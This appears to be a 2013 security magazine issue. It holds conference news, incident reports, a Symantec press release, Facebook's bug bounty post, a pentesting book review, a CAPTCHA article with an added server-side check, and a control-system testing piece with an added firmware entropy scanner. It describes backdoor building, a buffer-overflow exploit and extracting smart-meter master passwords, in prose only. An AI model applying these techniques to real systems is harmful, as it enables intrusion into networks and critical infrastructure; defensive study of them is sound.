Moataz: CSCAMP2013 is our 4th version. We are targeting to decrease the price more than in any other year so that delegates are able to attend without waiting for their companies to approve. Also we will announce our student program at the conference. This is a 4-month program for fresh graduates. We will provide them 5 courses from our catalogue. Students will be able to enroll in this program from Jan 2014. Also this year we want to expand our exhibition area to get more companies. The call for speakers will end on the 15th of August, so hurry up if you want to be one of the CSCAMP2013 speakers.

Aseem: nullcon Goa 2014 (Feb 12-15th) is our 5th anniversary and you can expect some really cool and new attack vectors, tools being released and some new stuff happening at the conference. We are going to open the CFP in Aug 2013. If you have any interesting and futuristic research, please submit your paper for the same. We are also going to open nominations for the Blackshield 2013 awards in information security. We started these awards in 2012 to honor outstanding security researchers, thought leaders and innovative companies. These are worldwide awards and not location specific. So, if you think you or your colleague has done something really interesting, feel free to nominate yourself/your colleague. Details on the awards will be provided soon on the website.

New & News

1. iPhone iOS 7 lock screen has been hacked

The all-new Apple iOS 7 launched at WWDC 2013 this week, and iPhone user Jose Rodriguez was able to bypass the lock screen and access the photos in just a few seconds, only 48 hours after the iOS 7 release. He said that "By opening iOS’s Control Room and accessing the phone’s calculator application before opening the phone’s camera, anyone can access, delete, email, upload or tweet the device’s photos without knowing its passcode."

2. Facebook virus Zeus targets bank accounts

Zeus propagates through phishing messages that originate from an account that has already been phished. Such an account then automatically sends messages to friends with links to ads telling them to check out a video or product. According to Trend Micro, the pages are hosted by the Russian Business Network. Zeus was first detected in 2007 and is still spreading online. The virus has affected the USA and the UK, and has moderately affected India, Russia, Canada, France and others.

3. Erdogan’s staff emails hacked by Syrian Electronic Army hackers as #OpTurkey

Hackers from Anonymous and the SEA hacked the Turkish Ministry of Interior website and obtained private information of staffers in PM Tayyip Erdogan's office. The hackers claimed that they gained access to staff email addresses, passwords and phone numbers. As exposed on the Internet, the database includes emails and plain-text passwords of 9 users; the team also defaced dosya.icisleri.gov.tr and placed their logo on the site. "Rise against the injustice of Erdogan's Tyranny. Rise against the policies of hypocrisy perpetrated by the Erdogan Regime," the defacement message reads.

4. Iranian Gmail users attacked

Tens of thousands of Gmail accounts belonging to Iranian users have been targeted in a politically motivated hacking campaign in the weeks leading up to the country's closely watched presidential elections. "These campaigns, which originate from within Iran, represent a significant jump in the overall volume of phishing activity in the region," said Eric Grosse, Google's Vice President for Security Engineering. "If you are in Iran, we encourage you to take extra steps to protect your account," added Grosse. To prevent phishing attacks, Google encouraged users in Iran to use a modern browser and enable two-step authentication, and to verify the login URL in the address bar of their browser before entering their Gmail password.

5. Iranian hackers can attack US oil, gas and electric companies

Iranian hackers were able to gain access to control-system software that could allow them to manipulate oil or gas pipelines. Malware has been found in the power grid that could be used to deliver malicious software to damage plants. The targets have included several American oil, gas and electricity companies, which government officials have refused to identify. Tom Cross, director of security research at Lancope, said that industrial control systems such as those used to control oil and gas pipelines are more interconnected with public networks like the Internet than most people realize. "It is also difficult to fix security flaws with these systems because they aren't designed to be patched and restarted frequently. In the era of state-sponsored computer attack activity, it is not surprising to hear reports of these systems being targeted," he added.

6. PayPal will pay Bug Bounty reward to teenager

The companies behind the programs will often pay out a bounty to the person who discovered the issue. The programs are intended to create an incentive for researchers to privately report issues and allow vendors to release fixes before hackers take advantage of flaws.

7. Whistleblower behind the NSA surveillance program leak (PRISM)

The individual responsible for one of the most significant leaks in US political history is Edward Snowden, who worked his way into the most secretive computers in U.S. intelligence as a defense contractor and identifies himself as the source of leaks about the US surveillance programme PRISM. He is responsible for handing over material from one of the world's most secretive organizations, the NSA. Snowden publicly revealed himself as the source of documents outlining a massive effort by the U.S. National Security Agency to track cell phone calls and monitor the e-mail and Internet traffic of virtually all Americans. He said, "I understand that I will be made to suffer for my actions," but "I will be satisfied if the federation of secret law, unequal pardon and irresistible executive powers that rule the world that I love are revealed even for an instant." He added, "Any analyst at any time can target anyone. Any selector. Anywhere. I, sitting at my desk, had the authority to wiretap anyone, from you or your accountant to a federal judge to even the president if I had a personal email."

8. Israel develops biological computer

Prof. Keinan, an Israeli researcher, said that "All biological systems, and even entire living organisms, are natural molecular computers. Every one of us is a bio-molecular computer, that is, a machine in which all components are molecules "talking" to one another in a logical manner. The hardware and software are complex biological molecules that activate one another to carry out some predetermined chemical tasks. The input is a molecule that undergoes specific, programmed changes, following a specific set of rules (software) and the output of this chemical computation process is another well defined molecule."

Symantec Internet Security Threat Report Reveals Increase in Cyberespionage – Including Threefold Increase in Small Business Attacks

Cairo, Egypt – Symantec Corp.’s (Nasdaq: SYMC) Internet Security Threat Report, Volume 18 (ISTR) today revealed a 42 percent surge during 2012 in targeted attacks compared to the prior year. Designed to steal intellectual property, these targeted cyberespionage attacks are increasingly hitting the manufacturing sector as well as small businesses, which are the target of 31 percent of these attacks globally. Small businesses are attractive targets themselves and a way in to ultimately reach larger companies via “watering hole” techniques. In addition, consumers remain vulnerable to ransomware and mobile threats, particularly on the Android platform.

“This year’s ISTR shows that cybercriminals aren’t slowing down, and they continue to devise new ways to steal information from organizations of all sizes,” said Justin Doo, Security Practice Director, Middle East, Symantec. “The sophistication of attacks coupled with today’s IT complexities, such as virtualization, mobility and cloud, require organizations in Egypt to remain proactive and use ‘defense in depth’ security measures to stay ahead of attacks.”

ISTR 18 Egypt Highlights:
• Decrease in global ranking in spam and phishing.
• Ranked first in the Middle East region for malicious code and in the top ten globally.
• Ranked second in the Middle East for overall security threat profile, behind Saudi Arabia.

ISTR 18 Key Highlights Include:

Small Businesses Are the Path of Least Resistance

Targeted attacks are growing the most among businesses with fewer than 250 employees. Small businesses are now the target of 31 percent of all attacks, a threefold increase from 2011. While small businesses may feel they are immune to targeted attacks, cybercriminals are enticed by these organizations’ bank account information, customer data and intellectual property. Attackers hone in on small businesses that may often lack adequate security practices and infrastructure. Web-based attacks increased by 30 percent in 2012, many of which originated from the compromised websites of small businesses. These websites were then used in massive cyber-attacks as well as “watering hole” attacks. In a watering hole attack, the attacker compromises a website, such as a blog or small business website, which is known to be frequently visited by the victim of interest. When the victim later visits the compromised website, a targeted attack payload is silently installed on their computer. The Elderwood Gang pioneered this class of attack and, in 2012, successfully infected 500 organizations in a single day. In these scenarios, the attacker leverages the weak security of one business to circumvent the potentially stronger security of another business.

Manufacturing Sector and Knowledge Workers Become Primary Targets

Shifting from governments, manufacturing has moved to the top of the list of industries targeted for attacks in 2012. Symantec believes this is attributable to an increase in attacks targeting the supply chain – cybercriminals find these contractors and subcontractors susceptible to attacks, and they are often in possession of valuable intellectual property. Often, by going after manufacturing companies in the supply chain, attackers gain access to sensitive information of a larger company. In addition, executives are no longer the leading targets of choice. In 2012, the most commonly targeted victims of these types of attacks across all industries were knowledge workers (27 percent) with access to intellectual property as well as those in sales (24 percent).

Mobile Malware and Malicious Websites Put Consumers and Businesses at Risk

Last year, mobile malware increased by 58 percent, and 32 percent of all mobile threats attempted to steal information, such as e-mail addresses and phone numbers. Surprisingly, these increases cannot necessarily be attributed to the 30 percent increase in mobile vulnerabilities. While Apple’s iOS had the most documented vulnerabilities, it only had one threat discovered during the same period. Android, by contrast, had fewer vulnerabilities but more threats than any other mobile operating system. Android’s market share, its open platform and the multiple distribution methods available to distribute malicious apps make it the go-to platform for attackers. In addition, 61 percent of malicious websites are actually legitimate websites that have been compromised and infected with malicious code. Business, technology and shopping websites were among the top five types of websites hosting infections. Symantec attributes this to unpatched vulnerabilities on legitimate websites. In years past, these websites were often targeted to sell fake antivirus to unsuspecting consumers. However, ransomware, a particularly vicious attack method, is now emerging as the malware of choice because of its high profitability for attackers. In this scenario, attackers use poisoned websites to infect unsuspecting users and lock their machines, demanding a ransom in order to regain access. Another growing source of infections on websites is malvertisements: criminals buy advertising space on legitimate websites and use it to hide their attack code.

About the Internet Security Threat Report

The Internet Security Threat Report provides an overview and analysis of the year in global threat activity. The report is based on data from Symantec’s Global Intelligence Network, which Symantec analysts use to identify, analyze, and provide commentary on emerging trends in attacks, malicious code activity, phishing, and spam.

About Symantec

Symantec protects the world’s information, and is a global leader in security, backup and availability solutions. Our innovative products and services protect people and information in any environment – from the smallest mobile device, to the enterprise data center, to cloud-based systems. Our world-renowned expertise in protecting data, identities and interactions gives our customers confidence in a connected world. More information is available at www.symantec.com or by connecting with Symantec at: go.symantec.com/socialmedia.


Updates to the Bug Bounty Program

Why a Bug Bounty Program?

Today I am writing about one recent improvement, our bug bounty program, that in a short time has proven valuable beyond our expectations.

Websites like Facebook that sit on the open Internet and offer a set of robust services don’t come together overnight. We hire the best and brightest, and have implemented numerous protocols, like our six-week intensive “boot-camp” and peer-reviewed code pushes, to ensure that only code that meets our rigorous standards is active on the site.

Even so, sometimes software code contains bugs. Generally speaking, there are bugs in software because of software complexity, programming errors, changes in requirements, errors made in bug tracking, limited documentation or bugs in software development tools. To deal with this, we have entire teams dedicated to searching out and disabling bugs, and we also hire outside auditors to help test our code. Our all-night “bug-a-thons” are also successful in locating and fixing issues.

We realize, though, that there are many talented and well-intentioned security experts around the world who don’t work for Facebook. Over the years, we have received excellent support from independent researchers who have let us know about bugs they have found. A couple of years ago, we decided to formalize a “whitehat” program to encourage these researchers to look for bugs and report them to us. We received really positive feedback when we launched our responsible disclosure policy last year, in which we told researchers we would not take adverse actions against them when they followed the policy in reporting bugs. Here’s a post from the Electronic Frontier Foundation, which praised our approach. As the EFF points out, “Well-meaning Internet users are often afraid to tell companies about security flaws they've found — they don't know whether they'll get...slapped with a lawsuit or even criminal prosecution.” We worked with several third-party groups to ensure that the language in our policy protects researchers and makes clear our intent to work with, not punish, those who report information. We are one of the first companies to clearly lay out our policy in order to make those who discover vulnerabilities more comfortable in reporting, and we are happy to see that other organizations are adopting a similar stance.

A few weeks ago, we took that program to the next level: we started paying rewards to those who report bugs to us. You can read about the details of the program here. We established this bug bounty program in an effort to recognize and reward these individuals for their good work and encourage others to join. It has been fascinating to watch the roll-out of this program from inside Facebook. First, it has been amazing to see how independent security talent around the world has mobilized to help. We know and have relationships with a large number of security experts, but this program has kicked off dialogue with a whole new and ever expanding set of people across the globe, in over 16 countries from Turkey to Poland, who are passionate about Internet security. The program has already paid out more than $40,000 in only three weeks, and one person has already received more than $7,000 for six different issues flagged. It has been a joy to engage in dialogue about issues and hear from the diverse perspectives these people bring.

The program has also been great because it has made our site more secure, by surfacing issues large and small, introducing us to novel attack vectors, and helping us improve lots of corners in our code. Because bug reports are often complicated and can involve complex legal issues, we chose our words carefully when announcing the program. Perhaps because of this, there have been several inaccurate reports about how the program works. For example, some stories said that the maximum payment would be $500, when in fact that is the minimum amount we will pay. In fact, we’ve already paid a $5,000 bounty for one really good report. On the other end of the spectrum, we’ve had to deal with bogus reports from people who were just looking for publicity. Some have even asked that we extend the bounty program to the Facebook Platform (the applications and websites built and run by third parties that you can connect to your Facebook identity). Unfortunately, that’s just not practical because of the hundreds of thousands of independent Internet services implicated, but we do care deeply about security on the Platform. We have a dedicated Platform Operations team that scrutinizes these partners, and we frequently audit their security and privacy practices. Additionally, we have built a number of backend tools that help automatically detect and disable spammy or malicious applications. People on our site agree that our protections, coupled with common sense, provide a rigorous level of security.

At the end of the day, we feel great knowing that we’ve launched another strong effort to help provide a secure experience on Facebook. A bug bounty program is a great way to engage with the security research community, and an even better way to improve security across a complex technological environment. Facebook truly does have the world’s best neighborhood watch program, and this program has proven that yet again for us.

I am the chief security officer of facebook.com; I manage a few of the teams at Facebook focused on making sure that people who use Facebook have a safe and positive experience.

Joe Sullivan

Book Review

Coding for Penetration Testers: Building Better Tools

Muhammed M. Bassem, Information Security Engineer

Below is a review of Coding for Penetration Testers by Elsevier, written by Jason Andress and Ryan Linn. First I would like to thank the BK community for their contribution in developing my own skills.

This book will be a valuable resource to those involved in penetration testing activities, as well as security professionals and network and system administrators. Those in development positions will find this information useful as well, from the standpoint of developing better tools for their organization. In order to gain the most out of this book, some knowledge or experience is required. The book will go over networking, advanced Windows commands and web and application exploitation.

Python, PHP, Perl, Ruby and PowerShell are all the programming/controlling languages you need to know. You can use w3schools as an overview for each language's structure/syntax and the semantics of the commands.


I was very excited during my journey with each chapter. The only problem I faced was that I got a mixture of syntax for each language; as such, I messed up the string concatenation syntaxes under PHP and Python. The authors give good tutorials and references for each language. My reaction before reading such a book was that I would need just two languages to do my assigned tasks under any penetration testing activity. This was a big joke after reading the first chapter. The author states that when we are attacking an environment, we don’t always get to choose the tools we have at hand, and we may very well find ourselves in a situation where we are not able to, or are not allowed to, install tools or utilities on a system. For that reason you have to add shell scripting to your skills, because shell scripts allow us to string together complex sets of commands, develop tools, automate processes, manipulate files and more.

So who are the authors of this book?

Jason Andress [ISSAP, CISSP, GPEN, C|EH] is a seasoned security professional with a depth of experience in both the academic and business world. He holds a doctorate in Computer Science, researching in the area of data protection. He has authored several publications and books, writing on topics including data security, network security, penetration testing and digital forensics.

Ryan Linn [OSCE, GPEN and GWAPT] is a penetration tester, an author, a developer and an educator. He comes from a system administration and web development background with many years of IT security experience. He is a regular contributor to open source projects such as Metasploit, the Browser Exploitation Framework and the Dradis Framework, as well as to many security conferences like “Defcon”.

Starting with chapter one, which is a good introduction to shell scripting. With my experience with bash scripting under Debian-based Linux, I passed through the first half of this chapter, while the other half was about PowerShell. It wasn’t hard, but it was difficult to understand that Microsoft has changed their mind in giving the administrator more power to manage his/her own operating system. Besides some syntax problems as usual, when I first used PowerShell I was happy that the “ls” command was working, and after a few hours I figured out that Microsoft has put their own touch on the command complexity, but with shell scripting knowledge you could deal with PowerShell.

The second chapter was about Python. The author started by explaining the power of Python. First you will learn how to manipulate files using Python, then go through client communication with a server. Here you will need to have knowledge of what sockets are and how to use them in sending/receiving over the channel you have. Also, don’t forget that blocks in Python are determined by tabs. This is the most important thing to remember during coding, because Java/C++ and other languages use brackets to detect blocks. This is called syntax difference.

Perl and Ruby were explored through the third and fourth chapters with the same methodology: learn syntax through basic paragraphs, practice, and then put all the knowledge together to build something to do file manipulation and network communication. Network communication, as stated before, relates to socket programming, but you also need to have background knowledge about what protocols are used for SNMP, SMB, FTP and SSH.

By understanding network basics you start to understand where your first point is to get into the victim machine. The aim of this is not to build a black hat community, but to know where we have our weaknesses. So before you know where it is, you have to do a Proof of Concept (“POC”) that states you have a threat from this parameter. To do so you need to learn how to use those protocols under each language, because we don’t always have a choice to install our own tools.


Chapter five takes a different trend. It starts to talk about web applications. The author uses PHP as one of the web application development languages. He shows us how to handle forms and command execution, besides file handling; the main idea I got from here was building backdoors using PHP for a compromised web server which supports PHP. It was a nice chapter from my perspective, but we also need to take a look at how we could do so through ASP.NET and Java. PHP is the most used language in web application development, but nowadays it is not the only one. Till this point we didn’t practice any step of the penetration testing methodology.

Chapter six talks about manipulating Windows using PowerShell, and expresses in depth the penetration testing uses for PowerShell.

Chapter seven starts the first step of the penetration testing methodology: discovery in active mode, using scanners such as Nmap, Nessus, OpenVAS and Netcat. The chapter shows how to use Nmap and Netcat to detect what ports are open/closed, while Nessus/OpenVAS do not just do fingerprinting or detecting the ports but also do vulnerability scanning. During this section the author introduces how to use NSE, which allows Nmap to have extended power to detect vulnerabilities. It was good knowledge to have, but you will still need to see how we are going to use the results of the data we collected about the target asset.

Chapter eight introduces you to another type of discovery, passive mode. This means you are not going to have direct communication with the target; you just use a search engine to collect data and metadata, similar to theHarvester tool in BackTrack. The author gives examples in Perl on how to extract metadata using the Google search engine. It was amazing and helpful, especially if you are going to engage in external penetration testing activity. The more you hear, the more you are able to understand; this is my comment on this chapter. (“Copied from Matt’s quote during the OSCP course.”)

Chapter nine was the big party of this long journey. Here we are going to use the Metasploit framework and build our own script for exploiting targets, in addition to Python and PHP scripting. I explored different strategies and methodologies for exploitation using different languages. You will use Python to create the war-FTPD exploit that leverages a buffer-overflow vulnerability to gain a remote shell. Once you do a POC, the author shows you how to turn the exploit into a more versatile Metasploit exploit using Ruby. Under web application vulnerabilities, the author was interested in only three: remote file inclusion, XSS and command execution. It was great fun, but this was not the end. I was happy to reach this point, but victory was still not ours.

Chapter ten, the last chapter in this book, guides you to victory. The problem is not just typing the string “YOU HAVE BEEN HACKED” over the compromised system, because this resource is not for the black hat community; it is for the white hat one, who have to care about data. A piece of information like a username and password may be worth $1 or may be worth $10^x. The attacker’s goal is to compromise more systems in your company’s infrastructure and, through your assets, discover the infrastructure hierarchy, dumping usernames and passwords to the systems as well as enumerating groups and user privileges, bypassing login pages and dumping the databases. It was awesome, and I felt the real power when I implemented this on my test lab using VirtualBox.

Summary: The machines have the power to manage the world, while humans are just pets. The world invests time and money to make life easier: building the World Wide Web to exchange information and building smart phones to facilitate communication in different ways. There is another door we have to see, one that someone could make use of to spy on you. You have to do regular assessments of your environment to discover its vulnerabilities and try to close these gaps before someone else finds out about them. The mission is to decrease the risk level from an information security point of view, which requires you to get more and more hands-on practice with each technology you have or know about. I recommend that readers of this book take a look at Perl, Ruby, Python and PHP basics before reading, to make full use of this resource. Thank you for your time.


CAPTCHA is not optional, it's mandatory

Ahmed Fawzy


What is CAPTCHA?

Web developers use CAPTCHA to ensure that when data is entered into a web form it is a human doing so, not a hacker using malicious code that generates automatic, valid-looking random data to fill the database with fake records or to create fake accounts on the victim web site.

Every web form has an attribute named 'action'; this attribute determines where the user's input in this form will go, as shown in Figure 1. Nothing forces the input to come from the browser form: an attacker can write a small piece of code and send thousands of values straight to the page named in the action attribute.

Smart developers will not accept any form data until the value of the CAPTCHA field matches the words in the image.

    <!-- The action attribute is the URL the browser posts the fields to.
         Anything can POST to that URL directly, so the CAPTCHA check must be
         done on the server side, in xyzaction.php, not in the browser. -->
    <form name='form1' method='post' action='http://www.Victim.com/xyzaction.php'>
      Name <input name='name' type='text' id='Contactname'>
      Email <input name='email' type='text' id='email'>
      Message <textarea name='message' cols='43' rows='4' id='message'></textarea>
      <input type='submit' name='Send' value='Send'>
      <input type='reset' name='Reset' value='Reset'>
    </form>


Benefits of using CAPTCHA:

1. Prevent denial of service attacks at the database level. The main benefit of using CAPTCHA is to prevent automated attacks on registration and sign-up forms. Hackers can write a small piece of code that generates random data which meets the validation conditions and therefore passes the validation controls: it is valid data, but it is also fake data. You can imagine what happens when thousands of fake records populate your database; this leads to a denial of service attack.

2. Prevent spam comments. Some websites allow users to comment on articles, stories or reports to increase user interaction with the website. Hackers can target this feature with malicious code to spam the website with thousands of random comments and fill the website database.

3. Protect the accuracy of online polls and questionnaires. It is very easy for a hacker to repeatedly check one answer or option in a questionnaire or poll to drive the public opinion towards his/her own. Good developers use CAPTCHA to restrict voting to humans only.

Why are CAPTCHA words so hard to read? This prevents hackers from writing malicious code that scans the image and generates the CAPTCHA answer automatically, so you must set the options of your CAPTCHA to generate images using shadows, italic words, random lines, etc.
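The server-side half of what the article describes (the check in xyzaction.php that refuses form data until the CAPTCHA matches, and the protection of sign-up, comment and poll forms listed above), as an added Python example that is not code from the article or its author. The challenge text is generated and kept on the server, the form carries only an opaque challenge id, and the handler never touches the database unless the answer matches an unexpired challenge that has not been used before. The function names, the five-minute lifetime and the in-memory store are assumptions; rendering the text into a distorted image is left out.

```python
import hmac
import secrets
import string
import time

CAPTCHA_TTL_SECONDS = 300   # assumption: a challenge is valid for five minutes
CAPTCHA_LENGTH = 6

# Server-side store of outstanding challenges: id -> (expected_text, expiry time).
# In production this belongs in the session store or a cache, never in the form itself,
# so the expected answer never leaves the server.
_challenges = {}


def issue_challenge(now=None):
    """Create a new CAPTCHA. Returns (challenge_id, text): the text is what gets drawn
    into the distorted image, the id is what goes into a hidden form field."""
    now = time.time() if now is None else now
    alphabet = string.ascii_lowercase + string.digits
    text = "".join(secrets.choice(alphabet) for _ in range(CAPTCHA_LENGTH))
    challenge_id = secrets.token_urlsafe(16)
    _challenges[challenge_id] = (text, now + CAPTCHA_TTL_SECONDS)
    return challenge_id, text


def verify_captcha(challenge_id, answer, now=None):
    """Consume the challenge. True only if it exists, is unexpired and the answer matches."""
    now = time.time() if now is None else now
    # pop() makes every challenge single-use: a solved token cannot be replayed
    # thousands of times against the action URL.
    entry = _challenges.pop(challenge_id, None)
    if entry is None:
        return False
    expected, expiry = entry
    if now > expiry:
        return False
    # constant-time comparison; different lengths simply compare unequal
    return hmac.compare_digest(expected.encode(), answer.strip().lower().encode())


def handle_submission(form, now=None):
    """Mirror of xyzaction.php: the CAPTCHA is checked before any field is stored."""
    if not verify_captcha(form.get("captcha_id", ""), form.get("captcha", ""), now=now):
        return ("rejected", None)
    record = {key: form.get(key, "") for key in ("name", "email", "message")}
    # here the real handler would write `record` to the database
    return ("stored", record)


if __name__ == "__main__":
    cid, text = issue_challenge()
    print(handle_submission({"captcha_id": cid, "captcha": text, "name": "Alice"}))
    print(handle_submission({"captcha_id": cid, "captcha": text, "name": "Alice"}))  # replay
```

The order matters: the CAPTCHA is consumed and compared before the name, email and message fields are even read, so a script posting directly to the action URL gets nothing into the database no matter how valid its other fields look.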

Figure 1


Assessing and Exploiting Control Systems

Penetration testing is one of many different types of security assessments you can perform to find vulnerabilities in any type of computer system, including the control systems found in every nation's critical infrastructure. While many of us perform penetration testing on IT systems for several different industries, not many security professionals have had the opportunity to perform penetration testing on control systems. Having spent the last five years of my thirteen-year career consulting and performing penetration tests in the energy sector, hopefully I can give a glimpse of how this differs from what I would consider the traditional penetration tests that we perform on other systems.

One of the biggest differences when assessing control systems is their sensitivity to malformed traffic and the risk of bringing down one of the systems. Because of these issues, penetration testing is rarely done on live production control systems. Instead, penetration testing often focuses on the connectivity to the control systems from corporate networks and other remote access capabilities. This type of penetration testing isn't any different from what you'd perform in a traditional penetration test.

However, we also perform in-depth penetration testing on newly acquired systems before they are placed into production, often as part of the purchasing process. This type of penetration test often differs significantly from traditional penetration tests because it usually focuses on one type of control system, from the master servers to the field/floor devices they control, not an entire network of disparate systems. But the biggest difference from traditional penetration tests is the depth to which we assess these systems. We don't stop at assessing the operating systems, their network services, and their web applications. We go beyond this and dig into the control system network protocols, the proprietary RF signaling between field/floor devices, and the embedded electronics in the field devices. This allows us to identify and address vulnerabilities not only in the servers running Windows and Linux that attackers can reach through remote network connections, but also in the embedded electronics and non-TCP/IP based networks that many control system devices use, which attackers can access through physical proximity.


The field/floor devices in the control systems we test are usually embedded, microcontroller-based devices that may not be running a commodity operating system. This hardware is commonly deployed in areas where attackers could easily gain physical access, such as on the sides of people's homes, on power line pole-tops, in substations found near populous areas, and in remote locations hours and sometimes days from human civilization. These embedded devices contain various electronic components that store data (EEPROM, Flash, RAM, MCU on-chip storage), communicate on buses that pass data between components (parallel buses and serial buses), and expose input interfaces used for administrative or debugging purposes (serial ports, parallel ports, infrared/optical ports).

The overarching goal for testing these embedded devices is to identify vulnerabilities that allow attackers to escalate their control from physical access to remote access or lesser physical access. Often these weaknesses show themselves in unprotected storage or transfer of sensitive information such as cryptographic keys, firmware, and any other information that an attacker can leverage to expand his attack. For example, in Advanced Metering Infrastructure (AMI) systems, we might successfully retrieve a smart meter’s C12.18 master password, a password that protects the optical interface on the front of smart meters deployed in the United States, enabling the tester to directly interface with the optical port on other meters without having to disconnect or dismantle the other meters. This assumes that the master C12.18 password is used throughout the smart meter deployment, which unfortunately is often the case in AMI systems.

The diagram below shows the overall process flow of the penetration testing tasks I use to test control system devices and teach in my new class, Assessing and Exploiting Control Systems with SamuraiSTFU. Performing this work often requires specialized tools and techniques. Here is the list of tools I often use to perform this type of work:

• Basic tools such as screwdrivers, wire cutters, pliers, tin snips, etc.
• Electronics equipment such as a power supply, digital multimeter, and oscilloscope
• Electronic prototyping supplies such as breadboard, wires, components, alligator jumpers, etc.
• Specialized tools to communicate directly with individual chips or capture serial communications, such as a Bus Pirate or a commercial equivalent such as the Total Phase Aardvark/Beagle
• Universal JTAG tool such as a Bus Blaster, GoodFET, or a RIFF Box
• Surface mount micro test clips
• Electric meter test socket
• Disassembler software for the appropriate microprocessors to be tested
• Entropy analysis software
• Protocol analysis software
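Entropy analysis, one of the tools in the list above, as an added Python example that is not part of the article or of the SamuraiSTFU project: it slides a window over a firmware dump pulled from a device's flash or EEPROM and labels each block by its Shannon entropy. That is how an assessor quickly tells erased flash, plain code or text, and the high-entropy regions (encrypted or compressed sections, key material) apart, and it is the first pass before deciding where cryptographic keys or firmware are stored without protection. The block size, the thresholds and the sample image are constructed assumptions, not values from the article.

```python
import hashlib
import math
from collections import Counter

BLOCK_SIZE = 512  # bytes per analysis window (assumption; tune to the part's page size)


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for a constant block, 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def classify(entropy: float) -> str:
    """Heuristic labels (assumed thresholds, not from the article)."""
    if entropy < 1.0:
        return "padding/erased"
    if entropy < 6.5:
        return "code/text"
    if entropy >= 7.0:
        return "high-entropy (encrypted, compressed or key material)"
    return "mixed"


def scan_image(image: bytes, block_size: int = BLOCK_SIZE):
    """Return a list of (offset, entropy, label) for each block of the dump."""
    report = []
    for offset in range(0, len(image), block_size):
        h = shannon_entropy(image[offset:offset + block_size])
        report.append((offset, round(h, 2), classify(h)))
    return report


def high_entropy_regions(report):
    """Offsets of the blocks worth a closer look when auditing a dump for unprotected keys."""
    return [offset for offset, _, label in report if label.startswith("high-entropy")]


def build_sample_image() -> bytes:
    """Constructed firmware-like image, not a real dump: erased flash, a text/code-like
    region, a deterministic pseudo-random region standing in for encrypted data, zero fill."""
    erased = b"\xff" * 1024
    text = (b"Firmware build 2013-07-18 for meter MCU; diagnostic console enabled.\n" * 20)[:1024]
    chain, seed = b"", b"constructed-sample"
    while len(chain) < 1024:
        seed = hashlib.sha256(seed).digest()
        chain += seed
    return erased + text + chain[:1024] + b"\x00" * 512


if __name__ == "__main__":
    for offset, h, label in scan_image(build_sample_image()):
        print(f"0x{offset:06x}  {h:5.2f} bits/byte  {label}")
```

On a real dump the interesting findings are usually the opposite of what the report flags: a key that should be encrypted shows up as a short high-entropy island inside an otherwise low-entropy region, and a firmware image that should be encrypted scans as code/text throughout.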

If you are interested in learning more about this testing methodology, check out my new open source project, the Samurai Security Testing Framework for Utilities (SamuraiSTFU) at http://www.SamuraiSTFU.org or the testing methodology I created for the United States Department of Energy named the NESCOR Guide to Penetration Testing for Electric Utilities, which you can find at http://www.smartgrid.epri.com.

I am the Managing Partner of UtiliSec, specializing in Smart Grid security architecture design and penetration testing.

Justin Searle
